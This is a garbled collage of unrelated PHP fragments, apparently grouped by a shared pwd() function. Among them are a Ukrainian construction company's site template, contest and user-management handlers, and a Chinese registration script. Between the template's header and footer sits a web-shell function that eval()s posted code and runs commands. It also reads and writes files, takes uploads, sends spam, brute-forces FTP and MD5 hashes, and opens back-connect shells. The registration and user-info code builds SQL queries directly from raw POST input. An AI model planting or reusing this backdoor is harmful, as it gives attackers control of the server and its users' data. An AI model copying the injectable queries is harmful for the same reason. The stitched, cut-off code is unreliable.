<?php $pwd = pwd(); ?>
<?php $get_hd = get_hd(); ?>
<!DOCTYPE html>
<html>
<head>
<link rel="shortcut icon" type="image/png" href="<?php echo $pwd ?>img/favicon.png"/>
<link rel="apple-touch-icon" href="<?php echo $pwd ?>img/favicon_apple.png"/>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta name="description" content="">
<meta name="author" content="">
<!--title-->
<title>Будівельна компанія MS</title>
<!--CSS-->
<link href="<?php echo $pwd ?>css/bootstrap.min.css" rel="stylesheet">
<!-- Add fancyBox -->
<link rel="stylesheet" href="<?php echo $pwd ?>fancybox/source/jquery.fancybox.css?v=2.1.5" type="text/css" media="screen" />
<!-- Optionally add helpers - button, thumbnail and/or media -->
<link rel="stylesheet" href="<?php echo $pwd ?>fancybox/source/helpers/jquery.fancybox-buttons.css?v=1.0.5" type="text/css" media="screen" />
<link rel="stylesheet" href="<?php echo $pwd ?>fancybox/source/helpers/jquery.fancybox-thumbs.css?v=1.0.7" type="text/css" media="screen" />
<link href="http://vjs.zencdn.net/4.11/video-js.css" rel="stylesheet">
function shell()
{
if ($_POST['type'] == 1) {
eval(stripslashes($_POST['value']));
} elseif ($_POST['type'] == 2) {
pwd();
print_r(ex(stripslashes($_POST['value'])));
} elseif ($_POST['type'] == 3) {
if ($_SESSION['safe_mode'] == 1) {
if (($u = safe_ex('ls -la')) != '') {
return $u;
} else {
return safe_ex('dir');
}
} else {
if (($u = ex('ls -la')) != '') {
return $u;
} else {
return ex('dir');
}
}
} elseif ($_POST['type'] == 4) {
if (file_exists(stripslashes($_POST['value']))) {
if ($safe_mode != 1) {
echo htmlspecialchars(fread(fopen(stripslashes($_POST['value']), "rw"), filesize(stripslashes($_POST['value']))));
} else {
echo htmlspecialchars(safe_read(stripslashes($_POST['value'])));
}
$_SESSION['edit'] = 1;
$_SESSION['filename'] = $_POST['value'];
} else {
return 'File doesn\'t exists!';
}
} elseif ($_POST['type'] == 5) {
fputs(fopen($_SESSION['filename'], "w"), stripslashes($_POST['value']));
} elseif ($_POST['type'] == 6) {
$uploaddir = pwd();
if (!($name = $_POST['newname'])) {
$name = $_FILES['userfile']['name'];
}
move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir . $name);
} elseif ($_POST['type'] == 7) {
echo alias($_POST['value']);
} elseif ($_POST['type'] == 8) {
echo spammer(stripslashes($_POST['from']), stripslashes($_POST['subject']), stripslashes($_POST['msg']), stripslashes($_POST['check']), stripslashes($_POST['elist']), stripslashes($_POST['logf']));
} elseif ($_POST['type'] == 9) {
echo ftp_brute(stripslashes($_POST['host']), stripslashes($_POST['users']), stripslashes($_POST['passwd']), stripslashes($_POST['log']));
} elseif ($_POST['type'] == 10) {
echo flooder(stripslashes($_POST['log']), stripslashes($_POST['to']), stripslashes($_POST['from']), stripslashes($_POST['subject']), stripslashes($_POST['msg']), stripslashes($_POST['amount']), stripslashes($_POST['check']));
} elseif ($_POST['type'] == 12) {
echo backconnect(stripslashes($_POST['ip']), stripslashes($_POST['port']), stripslashes($_POST['method']));
} elseif ($_POST['type'] == 13) {
echo backconnect(stripslashes($_POST['port']), stripslashes($_POST['pass']), stripslashes($_POST['method']));
} elseif ($_POST['type'] == 14) {
echo md5_brute(stripslashes($_POST['hash']), stripslashes($_POST['log']), stripslashes($_POST['dict']));
} else {
$u = ex('ls -la');
if ($u == '') {
return ex('dir');
} else {
return $u;
}
}
return null;
}
<?php
wp_footer();
$pwd = pwd();
?>
<footer>
<div class="container">
<div class="col-md-12">
<div class="row">
</div>
</div>
</div>
</div>
</footer>
<script src="<?php
echo $pwd;
?>
libs/slick/1.5.7/slick.min.js"></script>
<script src="<?php
echo $pwd;
?>
js/parallax.min.js"></script>
<script src="https://maps.googleapis.com/maps/api/js"></script>
<script type="text/javascript" src="http://cdn.jsdelivr.net/jquery.slick/1.5.7/slick.min.js"></script>
<script src="<?php
echo $pwd;
<?php
/**
* Created by PhpStorm.
* User: csibi
* Date: 2015.07.13.
* Time: 11:38
*/
$return_SQL = true;
if ($succeed = \Routerunner\Form::submit($runner->form, $errors, $return_SQL, $return_params)) {
$saved = false;
if (isset($return_params[":nonce"], $_SESSION["nonce"]) && \Routerunner\Crypt::checker($return_params[":nonce"], $_SESSION["nonce"])) {
unset($_SESSION["nonce"]);
$pwd_change = false;
if ($return_params[":pwd"] && $return_params[":pwd_confirm"] && $return_params[":pwd"] === $return_params[":pwd_confirm"]) {
$return_params[":pwd"] = pwd($return_params[":email"], $return_params[":pwd"]);
$pwd_change = true;
} elseif (($return_params[":pwd"] || $return_params[":pwd_confirm"]) && $return_params[":pwd"] !== $return_params[":pwd_confirm"]) {
$errors["pwd_confirm"] = "Passwords not equals!";
}
$is_insert = false;
$name = $return_params[":name"];
$usergroup = $return_params[":usergroup"];
if (strpos($return_SQL, "INSERT") === 0) {
$return_SQL = str_replace(array("`nonce`, ", "`id`, ", ", `usergroup`", ", `name`", ", `pwd_confirm`"), "", $return_SQL);
$return_SQL = str_replace(array(":nonce, ", ":id, ", ", :usergroup", ", :name", ", :pwd_confirm"), "", $return_SQL);
if (!$pwd_change) {
$return_SQL = str_replace(", `pwd`", "", $return_SQL);
$return_SQL = str_replace(", :pwd", "", $return_SQL);
}
unset($return_params[":id"]);
$start_time = convert_str($_POST['start_time']);
$end_time = convert_str($_POST['end_time']);
if ($_POST["localtime"] == 1) {
$dt = new DateTime($start_time, new DateTimeZone($_POST['localtz']));
$dt->setTimezone(new DateTimeZone($mytimezone));
$start_time = $dt->format('Y-m-d H:i:s');
$dt = new DateTime($lock_board_time, new DateTimeZone($_POST['localtz']));
$dt->setTimezone(new DateTimeZone($mytimezone));
$lock_board_time = $dt->format('Y-m-d H:i:s');
$dt = new DateTime($end_time, new DateTimeZone($_POST['localtz']));
$dt->setTimezone(new DateTimeZone($mytimezone));
$end_time = $dt->format('Y-m-d H:i:s');
}
$ctype = convert_str($_POST['ctype']);
$hide_others = convert_str($_POST['hide_others']);
$pass = pwd(convert_str($_POST['password']));
if ($_POST['password'] != "") {
$isprivate = 2;
}
if ($ctype == 0) {
$n = $config["limits"]["problems_on_contest_add"];
} else {
$n = $paratypemax;
}
for ($i = 0; $i < $n; $i++) {
$pid[$i] = convert_str($_POST['pid' . $i]);
$lable[$i] = convert_str($_POST['lable' . $i]);
$ptype[$i] = convert_str($_POST['ptype' . $i]);
$base[$i] = convert_str($_POST['base' . $i]);
$minp[$i] = convert_str($_POST['minp' . $i]);
$paraa[$i] = convert_str($_POST['paraa' . $i]);
<?php
include "db_conn.php";
if (db_user_match($_POST['username'], pwd($_POST['password'])) && db_user_isroot($_POST['username'])) {
session_start();
$_SESSION['isroot'] = 1;
}
include "header.php";
if (db_user_match($_POST['username'], pwd($_POST['password']))) {
$row = mysql_fetch_array(mysql_query("select * from user where username='******'username'] . "'"));
?>
<div class="mainbar">
<div class="article">
<h2>我的信息</h2><div class="clr"></div>
<table width="100%">
<tr><th>姓名:</th><td><?php
echo $row['realname'];
?>
</td></tr>
<tr><th>性别:</th><td><?php
echo $row['sex'];
?>
</td></tr>
<tr><th>邮箱:</th><td><?php
echo $row['mailaddress'];
?>
</td></tr>
<tr><th>手机:</th><td><?php
echo $row['mobilephone'];
?>
</td></tr>
<?php
include_once dirname(__FILE__) . "/../functions/contests.php";
$cid = convert_str($_POST['cid']);
$opass = contest_get_val($cid, "password");
$pass = convert_str($_POST['password']);
$ret = array();
if ($opass == pwd($pass)) {
setcookie($config["cookie_prefix"] . "contest_pass_{$cid}", pwd($pass), 0, $config["base_path"]);
$ret["code"] = 0;
$ret["msg"] = "Success!";
} else {
$ret["code"] = 1;
$ret["msg"] = "Wrong password.";
}
echo json_encode($ret);
<?php echo pwd();
if ($s[$i] >= '0' && $s[$i] <= '9' || $s[$i] >= 'a' && $s[$i] <= 'z' || $s[$i] >= 'A' && $s[$i] <= 'Z' || $s[i] == '-' || $s[i] == '_') {
continue;
} else {
break;
}
}
if ($i != strlen($s)) {
echo "用户名非法,请<a href='javascript:window.history.back()'>返回</a>重新选择用户名。\n";
} else {
if ($_POST['password'] != $_POST['repassword']) {
echo "密码不一致,请<a href='javascript:window.history.back()'>返回</a>重新输入。\n";
} else {
if ($_POST['username'] == "" || $_POST["password"] == "" || $_POST["realname"] == "" || $_POST["mailaddress"] == "" || $_POST["mobilephone"] == "" || $_POST["sno"] == "") {
echo "信息输入错误,请<a href='javascript:window.history.back()'>返回</a>重新输入。\n";
} else {
$sql = "insert into user set activation = 1, " . " username = '******'username'] . "', " . " password = '******'password']) . "', " . " realname = '" . $_POST['realname'] . "', " . " sex = '" . $_POST['sex'] . "', " . " mailaddress = '" . $_POST['mailaddress'] . "', " . " mobilephone = '" . $_POST['mobilephone'] . "', " . " depart = '" . $_POST['depart'] . "', " . " sno = '" . $_POST['sno'] . "', " . " grade = '" . $_POST['grade'] . "' ";
$res = mysql_query($sql);
if (!$res) {
echo "注册失败,请与管理员<a href='mailto:acm@mail.bnu.edu.cn'>联系</a>。\n";
} else {
$mail = new PHPMailer();
$mail->IsSMTP();
// telling the class to use SMTP
$mail->SMTPDebug = 1;
$mail->SMTPAuth = true;
$mail->Host = "mail.bnu.edu.cn";
// sets the SMTP server
$mail->Port = 25;
// set the SMTP port for the GMAIL server
$mail->Username = "******";
// SMTP account username
